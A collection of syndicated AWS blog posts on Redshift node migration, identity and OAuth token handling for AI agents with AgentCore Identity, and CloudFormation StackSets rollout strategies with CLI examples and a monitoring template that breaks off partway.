When upgrading Amazon Redshift, the method depends on the target configuration and operational constraints. For Redshift Serverless, always use the snapshot restore method. If upgrading to an RA3 provisioned cluster, you can choose from two options: use snapshot restore if a full maintenance window with downtime is acceptable, or choose classic resize for minimal downtime, because it rebalances the data slices to default per node, leading to even data distribution across the nodes. Although you can use elastic resize for certain node type changes (for example, DC2 to RA3) within specific ranges, it’s not recommended because elastic resize doesn’t change the number of slices, potentially leading to data or CPU skew, which can later impact the performance of the Redshift cluster. However, elastic resize remains the primary recommendation when you need to add or reduce nodes in an existing cluster.

Best practices for migration

When planning your migration, consider the following best practices:

  • Conduct a pre-migration assessment using Amazon Redshift Advisor or Amazon CloudWatch.
  • Choose the right target architecture based on your use cases and workloads. You can use Redshift Test Drive to determine the right target architecture.
  • Backup using manual snapshots, and enable automated rollback.
  • Communicate timelines, downtime, and changes to stakeholders.
  • Update runbooks with new architecture details and endpoints.
  • Validate workloads using benchmarks and data checksum.
  • Use maintenance windows for final syncs and cutovers.

By following these practices, you can achieve a controlled, low-risk migration that balances performance, cost, and operational continuity.

Conclusion

Migrating from Redshift DC2 nodes to RA3 nodes or Redshift Serverless requires a structured approach to support performance, cost-efficiency, and minimal disruption. By selecting the right architecture for your workload, and validating data and workloads post-migration, organizations can seamlessly modernize their data platforms. This upgrade facilitates long-term success, helping teams fully harness RA3’s scalable storage or Redshift Serverless auto scaling capabilities while optimizing costs and performance.


About the authors

Ziad Wali

Ziad Wali

Ziad is an Analytics Specialist Solutions Architect at AWS. He has over 10 years of experience in databases and data warehousing, where he enjoys building reliable, scalable, and efficient solutions. Outside of work, he enjoys sports and spending time in nature.

Omama Khurshid

Omama Khurshid

Omama is an Analytics Solutions Architect at Amazon Web Services. She focuses on helping customers across various industries build reliable, scalable, and efficient solutions. Outside of work, she enjoys spending time with her family, watching movies, listening to music, and learning new technologies.

Srikant Das

Srikant Das

Srikant is an Analytics Specialist Solutions Architect at Amazon Web Services, designing scalable, robust cloud solutions in Analytics & AI. Beyond his technical expertise, he shares travel adventures and data insights through engaging blogs, blending analytical rigor with storytelling on social media.

Securing AI agents with Amazon Bedrock AgentCore Identity

Post Syndicated from Abrom Douglas original https://aws.amazon.com/blogs/security/securing-ai-agents-with-amazon-bedrock-agentcore-identity/

By using Amazon Bedrock AgentCore, developers can build agentic workloads using a comprehensive set of enterprise-grade services that help quickly and securely deploy and operate AI agents at scale using any framework and model, hosted on Amazon Bedrock or elsewhere. AgentCore services are modular and composable, allowing them to be used together or independently. To get a high level overview of Amazon Bedrock AgentCore and all of the modular services, be sure to read the Introducing Amazon Bedrock AgentCore blog post.

In this post, I take a deeper look at AgentCore Identity, powered by Amazon Cognito, to introduce the identity and credential management features designed specifically for AI agents and automated workloads. AgentCore Identity provides secure, scalable agent identity and access management capabilities that are compatible with existing identity providers, avoiding the need for user migration or rebuilding authentication flows. Additionally, AgentCore Identity provides a token vault to help secure user access tokens and a native integration with AWS Secrets Manager to secure API keys and OAuth client credentials for external resources and tools, helps orchestrate standard OAuth flows, and centralizes AI agent identities to a secure central directory.

More specifically, here are some key features provided by AgentCore Identity:

  • Centralized agent identity management – A unified directory feature that serves as the single source of truth for managing agent identities across your organization, providing each agent a unique identity and associated metadata. This provides each agent identity a distinct identifier using Amazon Resource Names (ARNs) and providing a central view of your agents whether they’re hosted in AWS, self-hosted, or using a hybrid deployment.
  • Token vault – Securely store OAuth 2.0 Access and Refresh tokens, API keys, and OAuth 2.0 client secrets. Credentials are encrypted using AWS Key Management Service (AWS KMS) keys with support for customer-managed keys. The system implements strict access controls for credential retrieval, limiting access to individual agents only. For user-specific credentials such as OAuth 2.0 tokens, agents are restricted to accessing them solely on behalf of the associated user, maintaining least privilege and proper delegation mechanisms. When an expired access token is retrieved from the token vault and fails authorization with the resource server, the AI agent can use a secured refresh token to obtain and store a new access token. This allows a high security bar to be met, while improving the user experience by requiring less authentication requests to obtain new access tokens.
  • OAuth 2.0 flow support – Provides native support for OAuth 2.0 client credentials grant, also known as two-legged OAuth (2LO), and authorization code grant, also known as three-legged OAuth (3LO). This includes built-in credential providers for popular services and support for custom integrations. The service handles OAuth 2.0 implementations while offering simple APIs for agents to access AWS resources and third-party services.
  • Agent identity and access controls – Supports delegated authentication flow allowing agents to access resources using provided credentials while maintaining audit trails and access controls. Authorization decisions are based on the provided credentials during the delegation process.
  • AgentCore SDK integration – Offers integration through declarative annotations that automatically handle credential retrieval and injection, reducing boilerplate code, and providing a seamless developer experience. The Bedrock AgentCore SDK provides automatic error handling for common scenarios such as token expiration and user consent requirements.
  • Identity-aware authorization – Passes user context to agent code that allows the full access token to be forwarded to the agent code. AgentCore Identity first validates the token, then passes it to the agent where it can be decoded to obtain user context. In the case of passing an access token that does not have the full user context, the agent code can use it to call an OpenID Connect (OIDC) user info endpoint and retrieve user information. This can make sure agents get only the right access through dynamic decisions based on the user’s identity context, delivering enhanced security controls.

For full details on the features of AgentCore Identity, see the AgentCore developer guide.

Getting started with AgentCore Identity

There are several ways to get started with Amazon Bedrock AgentCore overall and more specifically with AgentCore Identity. You can follow the steps in Introducing Amazon Bedrock AgentCore: Securely deploy and operate AI agents at any scale for several AgentCore services, or you can navigate to the developer guide and follow along in the Getting started section for AgentCore Identity. Also, be sure to look into the Bedrock AgentCore Starter Toolkit GitHub repository and AgentCore Identity samples repository. Following the previous guides and samples will help you to get up and running quickly while using the Python Bedrock AgentCore SDK.

To start diving deeper into AgentCore Identity and how it can be used as a modular service, I’ll walk through an example use case involving a web application that uses AI agents. Using one of the features of the example application, the user can interact with an AI agent to help schedule meetings in their Google calendar. The AI agent will eventually be able to act on behalf of the authenticated human user. Let’s take a deeper look into this use case and better understand the end-to-end flow.

End-to-end flow example

The following sequence diagram (Figure 1) provides the details of an example end-to-end interaction between a human user signing in to a web application and interacting with an AI agent to perform actions on behalf of the human user. This shows how AgentCore Identity provides AI agent builders the identity primitives to create and secure AI agent identities, orchestrate a 3LO flow (following an authorization code grant flow), and securing temporary access tokens in the token vault for third-party OAuth resources, such as Google.

To help understand the end-to-end flow, I’ve broken this down into three different sub-flows. The first sub-flow is user authentication—in the example, the human user needs to first sign in to the web application. Amazon Cognito is used here, but you can use the identity provider of your choice. The second sub-flow is AI agent interaction—this is how the human user is interacting with the AI agent by way of the web application. This sub-flow also handles the orchestration between the human user and the AI agent, including consent, acquiring access tokens on behalf of the user, and securing them in the token vault. The third and last sub-flow is AI agent acting on behalf of user—as the name implies, these are the actions the AI agent is taking on behalf of the human user. This could include performing actions entirely within the application itself or by accessing external resource servers, such as Google Calendar in Figure 1.

Two prerequisites for the flow require setting up an OAuth 2.0 credential provider (Google is used for this flow) using the CreateOauth2CredentialProvider API, and creating your AI agent identity using the CreateWorkloadIdentity API.

Figure 1: End-to-end flow showing an example of a human user securely interacting with an AI agent.

Figure 1: End-to-end flow showing an example of a human user securely interacting with an AI agent.

User authentication

  1. The user navigates to the web application.
  2. There are no existing sessions or tokens. The client will redirect the user to the Amazon Cognito managed login and the user signs in with their username and password, or uses a passwordless OTP or passkey.
    • Amazon Cognito happens to be used in this flow with a local Cognito user account. This can also support federated login flows with third-party identity providers, including social, SAML, or OIDC providers.
  3. After successful authentication an authorization code is returned to the application, and this is used to call the /oauth2/token endpoint to get Cognito tokens.
  4. Amazon Cognito ID, access, and refresh tokens are returned to the client. I’ll refer to this access token as the human access token going forward.

AI agent interaction

  1. With the user signed in, they begin interacting with the AI agent through the web application and ask the AI agent to help with scheduling a meeting in their Google calendar.
  2. The prompt is sent to the backend where the AI agent is running along with the human access token.
  3. The AI agent will first obtain its own access token from AgentCore Identity. It will also provide the human access token as a request parameter. This is using the AgentCore Identity GetWorkloadAccessTokenForJWT API.
    • When using the GetWorkloadAccessTokenForJWT API, AgentCore Identity will verify the human access token signature and verify the token is not expired.
  4. AgentCore Identity returns an access token for the AI agent, going forward I’ll call this the AI agent access token. Because the human access token was provided during the initial request to get the AI agent access token, the specific returned AI agent access token is bound to the human user’s identity.
    • AgentCore Identity will derive the human user’s identity by combing the ISS and SUB claims within the human access token. You can learn more about obtaining credentials in the AgentCore Identity developer guide.
  5. The AI agent, using its own access token, will begin the process of obtaining a third, new access token from a third-party OAuth resource, which is Google in this flow. The AI agent will call the AgentCore Identity GetResourceOauth2Token API. Because this is the initial login flow and a human user is involved, an OAuth 2.0 authorization code grant flow will begin for the OAuth resource (that is, Google). This can be referred to as a 3LO flow.
    • The goal of this process is to obtain a temporary access token to be used with Google calendar that will be secured in the token vault. It’s important to note that as long as this access token for Google remains active after the human user has given consent, it can continue to securely be retrieved and used by the AI agent from the token vault.
  6. The Google authorization URL will be generated by AgentCore identity service based on the pre-configured Google OAuth client.
  7. The Google authorization URL is sent to the client from the AI agent.
  8. The client will immediately redirect to Google’s authorization endpoint and begin the auth flow for the human user to sign in to Google.
  9. After a successful authentication with Google, an authorization code is returned to AgentCore Identity, and an access token is obtained following the OAuth 2.0 authorization code grant flow.
  10. The access token from Google for the user is secured in the token vault. I’ll call this third access token going forward the Google access token.
    • Tokens are secured in the token vault under the agent identity ID and the user ID, this way the token is bound between the agent identity, the human identity, and the Google access token.
  11. As the authorization code grant completes its process to obtain a Google access token in the backend, the user will be redirected back to the frontend of the application. This is configured as the callback URL.

AI agent acting on behalf of the user

  1. The AI agent will call the GetResourceOauth2Token API again (same as step 9) and include the AI agent access token as the workloadIdentityToken request parameter.
  2. However, this time the Google access token is returned from the token vault. This provides an enhanced user experience by reducing consent fatigue and minimizing the number of authorization prompts.
  3. With the original context and intent of having the AI agent help schedule a meeting in Google calendar, the AI agent will call the Google Calendar APIs with the Google access token.
    • The Google access token used by the AI agent will have the https://www.googleapis.com/auth/calendar.events scope, authorizing certain calendar actions.
  4. After actions are complete between the AI agent and Google calendar, success responses (or failures) will be returned to the AI agent.
    • This could be an opportunity for the AI agent to perform other automated actions, such as updating a user record in the web application’s backend.
  5. After all actions of the AI agent are complete, a success response is returned to the frontend application.

The previous flow describes the entire end-to-end process starting from a human user needing to sign in to the web application and ending with an AI agent performing an automated action on behalf of the user. Three different access tokens were involved in this process, and the following is a summary of these access tokens.

  • Human access token – This is issued by an Amazon Cognito user pool (or another identity provider). This access token is used to access the web application and is used to obtain the AI agent access token using the GetWorkloadAccessTokenForJWT API.
  • AI agent access token –This is issued by AgentCore Identity. This access token is used by the AI agent to securely access the token vault.
  • Google access token – This is issued by Google representing the human user. This access token is what’s secured in the token vault and can be securely retrieved by the AI agent access token.

Conclusion

Organizations are rapidly seeking opportunities to use AI agents to automate workflows and enhance user experiences, but this adoption can introduce security and compliance challenges that can’t be ignored. Organizations must make sure that AI agents can securely access resources on behalf of users while protecting sensitive credentials and maintaining compliance at scale. AgentCore Identity addresses these fundamental challenges by providing enterprise-grade security that protects user credentials and maintains strict access controls. This helps make sure that AI agents can only access what they need when they need it. The service integrates with existing identity systems, avoiding the need for complex migrations or rebuilding authentication flows. Its centralized management of AI agent identities reduces operational overhead and strengthens security posture. For organizations scaling their AI initiatives, these capabilities translate into faster time-to-market and reduced risk of unauthorized access. By implementing AgentCore Identity, organizations can confidently deploy AI agents with built-in OAuth support and secure token management, while lowering development and maintenance costs through streamlined security controls that scale with their business needs.

To learn more about building with AgentCore Identity in your organization, review some example use cases and visit the Getting started with AgentCore Identity section of the developer guide to explore prerequisites, SDK usage, best practices, and start building your first authenticated agent.

Use the comments section to leave feedback and engage about this post. If you have questions about this post, start a new thread on Amazon Bedrock AgentCore re:Post or contact AWS Support.

 

 

Abrom Douglas

Abrom Douglas III

Abrom is a Senior Solutions Architect within AWS Identity with nearly 20 years of software engineering and security experience, specializing in the identity and access management space. He loves speaking with customers about how identity and access management can provide secure outcomes that enable both business and technology initiatives. In his free time, he enjoys cheering for Arsenal FC, photography, travel, volunteering, and competing in duathlons.

StackSets Deployment Strategies: Balancing Speed, Safety, and Scale to Optimize Deployments for Different Organizational Needs

Post Syndicated from Amar Meriche original https://aws.amazon.com/blogs/devops/stacksets-deployment-strategies-balancing-speed-safety-and-scale-to-optimize-deployments-for-different-organizational-needs/

AWS CloudFormation StackSets enables organizations to deploy infrastructure consistently across multiple AWS accounts and regions. However, success depends on choosing the right deployment strategy that balances three critical factors: deployment speed, operational safety, and organizational scale. This guide explores proven StackSets deployment strategies specifically designed for multi-account infrastructure management.

Understanding StackSets Deployment Fundamentals

What are StackSets Actually Used For?

Unlike single-account AWS CloudFormation templates, StackSets are specifically designed for multi-account infrastructure governance. Common use cases include Security baselines (deploying IAM policies, security groups, and access controls across all accounts), Compliance controls (rolling out AWS Config rules, AWS CloudTrail configurations, and audit requirements), Organizational standards (establishing consistent VPC configurations, tagging policies, and naming conventions), Shared services (deploying monitoring solutions, logging infrastructure, and backup policies) or Cost management (implementing budget controls, cost allocation tags, and resource optimization policies)

The Multi-Account Challenge

Managing infrastructure across dozens or hundreds of AWS accounts presents unique challenges:

Single Account (CFN Template)     Multi-Account (StackSets)
      App A                           Org Unit A (50 accounts)
        |                                     |
   [Deploy Once]               [Deploy consistently across all]
        |                                     |
    Success/Fail                Complex success/failure matrix

Multi account and multi region Cloudformation deployment complexity

The Speed-Safety-Scale Triangle

Every StackSets deployment strategy involves trade-offs: Speed (how quickly changes propagate across your organization), Safety (risk mitigation and failure containment) and Scale (ability to manage hundreds of accounts efficiently)

Prerequisites

Before implementing any of the deployment strategies described in this guide, ensure you have:

  1. AWS CLI Installation
    1. Install the latest version of AWS CLI by following the AWS CLI installation guide
    2. Verify installation with: aws –version
  2. AWS Profile Configuration
    1. Configure your AWS credentials using: aws configure
    2. For details on configuration, see AWS CLI configuration basics
    3. Ensure your profile has appropriate permissions for CloudFormation StackSets operations as described in AWS StackSets prerequisites
  3. Proper Account Access The commands in this guide must be executed from either:
    1. The management account of your AWS Organization
    2. OR a delegated administrator account for CloudFormation

For information on setting up a delegated administrator, see Register a delegated administrator

Note: StackSets deployments using service-managed permissions cannot be performed from standalone accounts.

Verify you’re using the correct account with:

bash
# For management account
aws organizations describe-organization
# For delegated admin
aws cloudformation list-stack-sets —call-as DELEGATED_ADMIN

AWS CLI to check the usage of an Organization and not a Standalone account

Core Deployment Strategies

As explained in the StackSet documentation:

  • “For a more conservative deployment, set Maximum Concurrent Accounts to 1, and Failure Tolerance to 0. Set your lowest-impact region to be first in the Region Order Start with one region.”
  • “For a faster deployment, increase the values of Maximum Concurrent Accounts and Failure Tolerance as needed. ”

Based on the above, we are proposing below several deployment strategies, depending on the speed, safety and scale you want to achieve.

1. Sequential Deployment: Maximum Safety

Use Case : Critical security updates, compliance requirements, first-time organizational rollouts

Below are listed some possible use cases:

  • Security baseline updates: New IAM policies affecting root access
  • Compliance rollouts: SOX, HIPAA, or PCI-DSS control implementations
  • Critical infrastructure changes: VPC security group modifications
  • Organizational policy changes: New AWS Config rules for audit compliance

Implementation Example:

For this example, we will download the following template ConfigRuleCloudtrailEnabled.yml from the Cloudformation sample library in the AWS documentation to configure an AWS Config rule to determine if AWS CloudTrail is enabled and follow the next steps:

Step 1: Create the StackSet

With the AWS CLI:

# Create Stackset for security baseline
# StackSet operation managed from us-east-1
aws cloudformation create-stack-set \
  --stack-set-name security-baseline \
  --template-body file://ConfigRuleCloudtrailEnabled.yml \
  --capabilities CAPABILITY_NAMED_IAM \
  --permission-model SERVICE_MANAGED \
  --auto-deployment Enabled=true,RetainStacksOnAccountRemoval=false \
  --region us-east-1

AWS CLI to create a security-baseline Stackset

The expected response should be similar to the following :

{"StacksetId": "security-baseline: ...."}

Step 2: Create Stack Instances

Before you launch the below command, you need to adjust the values of the following parameters:

  • OrganizationalUnitIds: you must change the value “ou-test” in the below command line to the name of the target OU you want to deploy to. I recommend creating a new test OU in the console or via the CLI for the purpose of this test.
  • regions: if needed, change the “us-east-1 eu-west-1” value, here you need to list all the regions you want to deploy to. AWS Config must be active in the accounts/regions that you choose, otherwise you’ll get an error when deploying the Stack.

# Deploy security baseline to production accounts
# StackSet operation managed from us-east-1
# Deployed to regions us-east-1 and eu-west-1
# SEQUENTIAL = One region at a time, sequentially
# MaxConcurrentPercentage = Deploy to 5% of accounts at once
# FailureTolerancePercentage = Stop on first failure
aws cloudformation create-stack-instances \
  --stack-set-name security-baseline \
  --deployment-targets OrganizationalUnitIds=ou-test\
  --regions us-east-1 eu-west-1 \
  --region us-east-1 \
  --operation-preferences RegionConcurrencyType=SEQUENTIAL,MaxConcurrentPercentage=5,FailureTolerancePercentage=0

AWS CLI to create security-baseline Stack Instances sequentially for maximum safety

The CLI output should look like the following:

{"OperationId": ....}

Or create the StackSet and add the Stacks with the AWS Console:

In the CloudFormation Console, click “Create StackSet”

AWS CloudFormation Console: create a security-baseline Stackset

AWS CloudFormation Console: create a security-baseline Stackset

Upload your template from S3 or from your computer and click Next:

AWS CloudFormation Console: specify a template

AWS CloudFormation Console: specify a template

Specify the StackSet name and parameters and click Next:

AWS CloudFormation Console: specify the StackSet name and parameters

AWS CloudFormation Console: specify the StackSet name and parameters

Configure StackSet options and click Next:

AWS CloudFormation Console: configure the StackSet options

AWS CloudFormation Console: configure the StackSet options

Set deployment options and click Next:

AWS CloudFormation Console: set deployment options

AWS CloudFormation Console: set deployment options

AWS CloudFormation Console: set deployment options

AWS CloudFormation Console: set more deployment options

Then Review and Submit.

Not to overweight this blog, we’ll provide only this example of CLI output and Console screenshot, but the “Parallel Deployment” and “Balanced Approach” will be similar to this example. You just need to update the parameters for the different StackSet Operations options.

A real-world example would be a financial services company deploying new MFA requirements across 200 production accounts. They could use sequential deployment with 5 concurrency to ensure each batch was validated before proceeding.

2. Parallel Deployment: Maximum Speed

The Parallel Deployment is best for non-critical updates, development environments, routine maintenance

Here are some possible use cases:

  • Development account standardization: Rolling out new development tools
  • Monitoring infrastructure: Deploying Amazon CloudWatch dashboards and alarms
  • Cost optimization: Implementing automated resource cleanup policies
  • Non-production updates: Updating development and staging environments

Implementation Example:

For this example, we will copy paste the .yml template from this Re:Post article about monitoring IAM events in a file called “monitoring-baseline.yml”, and use it in the following command lines.

Step 1: Create the StackSet

# Create Stackset for monitoring baseline
# StackSet operation managed from us-east-1
aws cloudformation create-stack-set \
--stack-set-name monitoring-baseline \
--template-body file://monitoring-baseline.yml \
--capabilities CAPABILITY_NAMED_IAM \
--permission-model SERVICE_MANAGED \
--auto-deployment Enabled=true,RetainStacksOnAccountRemoval=false \
--region us-east-1

AWS CLI to create a monitoring-baseline Stackset

Step 2: Create Stack Instances

Just like in the previous example, before you launch the below command, you need to adjust the values of the OrganizationalUnitIds and regions parameters.

# Deploy monitoring baseline to dev and sandbox accounts
# StackSet operation managed from us-east-1
# Deployed to regions us-east-1 and eu-west-1
# PARALLEL = Deployment in parallel
# MaxConcurrentPercentage = Deploy to 80% of accounts at once
# FailureTolerancePercentage = Tolerate failures in 20% of accounts
aws cloudformation create-stack-instances \
--stack-set-name monitoring-baseline \
--deployment-targets OrganizationalUnitIds=ou-development,ou-sandbox \
--regions us-east-1 eu-west-1 \
--region us-east-1 \
--operation-preferences RegionConcurrencyType=PARALLEL,MaxConcurrentPercentage=80,FailureTolerancePercentage=20

AWS CLI to create monitoring-baseline Stack Instances in parallel with high value for max concurrent percentage for maximum speed

3. Progressive Deployment: Balanced Approach or Multi Phase Approach (Recommended)

For most production scenarios with moderate risk tolerance, it is recommended to use a Balanced Approach, or Multi-Phase Implementation.

Balanced Approach

For this example, to make it easier, you can create a copy of “monitoring-baseline.yml” created previously, and name it “balanced-template.yml”.

cp monitoring-baseline.yml balanced-template.yml

bash command to copy the monitoring-baseline.yml file to balanced-template.yml

Then you can use it in the following command lines.

Step 1: Create the StackSet

# Create Stackset for a balanced creation
# StackSet operation managed from us-east-1
aws cloudformation create-stack-set \
--stack-set-name balanced-deployment \
--template-body file://balanced-template.yml \
--capabilities CAPABILITY_NAMED_IAM \
--permission-model SERVICE_MANAGED \
--auto-deployment Enabled=true,RetainStacksOnAccountRemoval=false \
--region us-east-1

AWS CLI to create a balanced-deployment Stackset

Step 2: Create Stack Instances

You need to adjust the values of the OrganizationalUnitIds and regions parameters.

# Deploy monitoring baseline to production accounts
# StackSet operation managed from us-east-1
# Deployed to regions us-east-1, eu-west-1 and ap-southeast-1
# PARALLEL = Deployment in parallel
# MaxConcurrentPercentage = Deploy to 25% of accounts at once
# FailureTolerancePercentage = Tolerate failures in 8% of accounts
aws cloudformation create-stack-instances \
--stack-set-name balanced-deployment \
--deployment-targets OrganizationalUnitIds=ou-development,ou-sandbox \
--regions us-east-1 eu-west-1 ap-southeast-1 \
--region us-east-1 \
--operation-preferences RegionConcurrencyType=PARALLEL,MaxConcurrentPercentage=25,FailureTolerancePercentage=8

AWS CLI to create balanced-deployment Stack Instances in parallel with low max concurrent percentage for a balanced deployment

Multi-Phase Implementation:

Step 1: Create the StackSet

# Create Stackset for a balanced creation
# StackSet operation managed from us-east-1
aws cloudformation create-stack-set \
--stack-set-name balanced-deployment \
--template-body file://balanced-template.yml \
--capabilities CAPABILITY_NAMED_IAM \
--permission-model SERVICE_MANAGED \
--auto-deployment Enabled=true,RetainStacksOnAccountRemoval=false \
--region us-east-1

AWS CLI to create a balanced-deployment Stackset

Phase 1: Pilot Accounts (10% of target)

Phase 1: Create Pilot Stack Instances

You need to adjust the values of the OrganizationalUnitIds and regions parameters.

# Deploy monitoring baseline to production accounts
# StackSet operation managed from us-east-1
# Deployed to regions us-east-1
# SEQUENTIAL = Deployment in sequence
# MaxConcurrentPercentage = 100% Deploy full speed for small pilot
# FailureTolerancePercentage = Zero tolerance in pilot
aws cloudformation create-stack-instances \
--stack-set-name balanced-deployment \
--deployment-targets Accounts=pilot-account-1,pilot-account-2 \
--regions us-east-1 \
--region us-east-1 \
--operation-preferences RegionConcurrencyType=SEQUENTIAL,MaxConcurrentPercentage=100,FailureTolerancePercentage=0

AWS CLI to create balanced-deployment Stack Instances sequentially for maximum safety in Pilot accounts

Wait for Pilot validation before proceeding to Phase 2

Phase 2: Early Adopter OUs (30% of target)

Phase 2: Create Early Adopter Stack Instances

You need to adjust the values of the OrganizationalUnitIds and regions parameters.

# Deploy monitoring baseline to production accounts
# StackSet operation managed from us-east-1
# Deployed to regions us-east-1, eu-west-1
# PARALLEL = Deployment in parallel
# MaxConcurrentPercentage = Deploy to 25% of accounts at once
# FailureTolerancePercentage = Tolerate failures in 5% of accounts
aws cloudformation create-stack-instances \
--stack-set-name balanced-deployment \
--deployment-targets OrganizationalUnitIds=ou-early-adopter \
--regions us-east-1 \
--region us-east-1 eu-west-1 \
--operation-preferences RegionConcurrencyType=PARALLEL,MaxConcurrentPercentage=25,FailureTolerancePercentage=5

AWS CLI to create balanced-deployment Stack Instances in parallel with low max concurrent percentage for a balanced deployment in Early Adopter OU

Wait for Early Adopter validation before proceeding to Phase 3

Phase 3: Full Deployment (Remaining 60%)

Phase 3: Full Deployment

You need to adjust the values of the OrganizationalUnitIds and regions parameters.

# Deploy monitoring baseline to production accounts
# StackSet operation managed from us-east-1
# Deployed to regions us-east-1, eu-west-1 and ap-southeast-1
# PARALLEL = Deployment in parallel
# MaxConcurrentPercentage = Deploy to 40% of accounts at once for higher speed after validation
# FailureTolerancePercentage = Tolerate failures in 10% of accounts for moderate tolerance
aws cloudformation create-stack-instances \
--stack-set-name balanced-deployment \
--deployment-targets OrganizationalUnitIds=ou-standard-prod,ou-legacy-prod \
--regions us-east-1 \
--region us-east-1 eu-west-1 ap-southeast-1 \
--operation-preferences RegionConcurrencyType=PARALLEL,MaxConcurrentPercentage=25,FailureTolerancePercentage=5

AWS CLI to create balanced-deployment Stack Instances in parallel with low max concurrent percentage for a balanced deployment in the remaining OUs

Using Step Functions for Orchestration

AWS Step Functions provides a serverless workflow service that can orchestrate StackSets deployments with advanced control flow, error handling, and state management capabilities. This approach enhances your multi-account deployments with features not available through standard StackSets operations alone.

Some of the Key Benefits include:

  • Advanced Deployment Orchestration: Coordinate multi-phase rollouts with validation gates
  • Human Approval Workflows: Implement manual approval steps for critical changes
  • Enhanced Error Handling: Define sophisticated retry policies and fallback mechanisms
  • Visual Monitoring: Track deployment progress through the Step Functions visual console

Real-World Use Case: Compliance Control Rollout

In regulated industries, AWS Step Functions enables a phased approach that combines automation with necessary governance. For instance, you can:

  1. Deploy compliance controls to test accounts
  2. Run automated validation and generate compliance reports
  3. Obtain manual approval from compliance team
  4. Deploy to production accounts with comprehensive monitoring

This approach ensures consistent governance while maintaining the complete audit trail required for regulatory compliance.

Monitoring and Optimization

AWS CloudFormation StackSets do not have extensive built-in Amazon CloudWatch metrics specifically designed for monitoring StackSet operations and health. This is actually why the monitoring implementation in our blog post is valuable.

Here’s what AWS does and doesn’t provide out of the box:

What AWS provides natively:

  • Basic AWS API call metrics via AWS CloudTrail (which show that operations happened but don’t track success rates or performance)
  • General service quotas and throttling metrics for CloudFormation as a whole
  • CloudFormation provides some metrics for individual stacks, but not consolidated StackSet-specific metrics

What requires custom implementation (as in our blog post):

  • Success rate metrics for StackSet operations across accounts
  • Deployment completion time tracking
  • Configuration drift detection and monitoring
  • Account-specific failure analysis
  • Comprehensive dashboards that show StackSet health across your organization

The code in our blog post demonstrates how to implement the success rate custom metrics by:

  1. Gathering data from the CloudFormation API about StackSet operations
  2. Calculating the success rate metrics for StackSet deployments
  3. Creating custom Amazon CloudWatch metrics in a custom namespace (like “StackSetMonitoring”)
  4. Setting up alerts for issues

This explains why organizations need to implement custom monitoring solutions like the one shown in our blog post rather than relying solely on built-in metrics.

Automated Monitoring Implementation: example of a custom metric to monitor the StackSet operations success rate

The following AWS Cloudformation template provides real-time monitoring and alerting for AWS CloudFormation StackSet operations through automated infrastructure deployment. This solution creates a complete monitoring system using a AWS Lambda function, Amazon EventBridge rules, Amazon SNS notifications, and Amazon CloudWatch dashboards to track StackSet success and failure rates. The core Lambda function named StackSetMonitor continuously monitors all active StackSets in your account, calculating success rates and publishing custom metrics to Amazon CloudWatch under the StackSetMonitoring namespace.

Below you’ll find a few example of possible custom metrics that could be implemented based on this AWS Cloudformation template:

  • Count of all operations (CREATE, UPDATE, DELETE) per StackSet over time periods
  • Number of stack instances with configuration drift (requires additional API calls)
  • Average time taken for StackSet operations to complete
  • Rate of StackSet operations to identify peak usage times
  • Number of individual stack instances that failed during operations
  • Number of retried operations (indicates infrastructure issues)

Here’s the StackSetMonitor.yml CloudFormation Template:

# StackSetMonitor.yml 
# CFN template for monitoring AWS CloudFormation StackSet operations with real-time alerts, metrics, and dashboards.

AWSTemplateFormatVersion: '2010-09-09'
Description: 'CloudFormation template for StackSet operation monitoring using CloudWatch and SNS'

Parameters:
  StackSetName:
    Type: String
    Description: 'Name of the StackSet to monitor'
    Default: 'security-baseline'
    MinLength: 1
    MaxLength: 128
    AllowedPattern: '[a-zA-Z][-a-zA-Z0-9]*'
    ConstraintDescription: 'Must be a valid StackSet name (1-128 characters, alphanumeric and hyphens, must start with a letter)'
  
  VpcId:
    Type: String
    Description: 'VPC ID where the Lambda function will be deployed (leave empty to create new VPC)'
    Default: ''
  
  SubnetIds:
    Type: CommaDelimitedList
    Description: 'List of subnet IDs for the Lambda function (leave empty to create new subnets)'
    Default: ''
    
  SecurityGroupIds:
    Type: CommaDelimitedList
    Description: 'List of security group IDs for the Lambda function (leave empty to create new security group)'
    Default: ''

Conditions:
  CreateVPC: !Equals [!Ref VpcId, '']
  CreateVPCAndSubnets: !And [!Equals [!Ref VpcId, ''], !Equals [!Join [',', !Ref SubnetIds], '']]
  HasCustomSecurityGroups: !Not [!Equals [!Join [',', !Ref SecurityGroupIds], '']]
  
Resources:
  # KMS Key for CloudWatch Logs encryption
  LogsKMSKey:
    Type: AWS::KMS::Key
    DeletionPolicy: Delete
    UpdateReplacePolicy: Delete
    Properties:
      Description: 'KMS Key for StackSet Monitor CloudWatch Logs and Lambda environment variable encryption'
      EnableKeyRotation: true
      KeyPolicy:
        Version: '2012-10-17'
        Statement:
          - Sid: Enable IAM User Permissions
            Effect: Allow
            Principal:
              AWS: !Sub 'arn:${AWS::Partition}:iam::${AWS::AccountId}:root'
            Action: 'kms:*'
            Resource: '*'
          - Sid: Allow CloudWatch Logs
            Effect: Allow
            Principal:
              Service: !Sub 'logs.${AWS::Region}.amazonaws.com'
            Action:
              - 'kms:Encrypt'
              - 'kms:Decrypt'
              - 'kms:ReEncrypt*'
              - 'kms:GenerateDataKey*'
              - 'kms:DescribeKey'
            Resource: '*'
            Condition:
              ArnEquals:
                'kms:EncryptionContext:aws:logs:arn': 
                  - !Sub 'arn:${AWS::Partition}:logs:${AWS::Region}:${AWS::AccountId}:log-group:/aws/lambda/StackSetMonitor'
                  - !Sub 'arn:${AWS::Partition}:logs:${AWS::Region}:${AWS::AccountId}:log-group:/aws/cloudformation/stacksets'
          - Sid: Allow Lambda Service
            Effect: Allow
            Principal:
              Service: lambda.amazonaws.com
            Action:
              - 'kms:Encrypt'
              - 'kms:Decrypt'
              - 'kms:ReEncrypt*'
              - 'kms:GenerateDataKey*'
              - 'kms:DescribeKey'
            Resource: '*'

  LogsKMSKeyAlias:
    Type: AWS::KMS::Alias
    Properties:
      AliasName: alias/stackset-monitor-logs
      TargetKeyId: !Ref LogsKMSKey

  # VPC Resources (created when no existing VPC is provided)
  StackSetMonitorVPC:
    Type: AWS::EC2::VPC
    Condition: CreateVPC
    Properties:
      CidrBlock: 10.0.0.0/16
      EnableDnsHostnames: true
      EnableDnsSupport: true
      Tags:
        - Key: Name
          Value: StackSetMonitor-VPC
        - Key: Purpose
          Value: VPC for StackSet Monitor Lambda function


  PrivateSubnet1:
    Type: AWS::EC2::Subnet
    Condition: CreateVPC
    Properties:
      VpcId: !Ref StackSetMonitorVPC
      CidrBlock: 10.0.1.0/24
      AvailabilityZone: !Select [0, !GetAZs '']
      Tags:
        - Key: Name
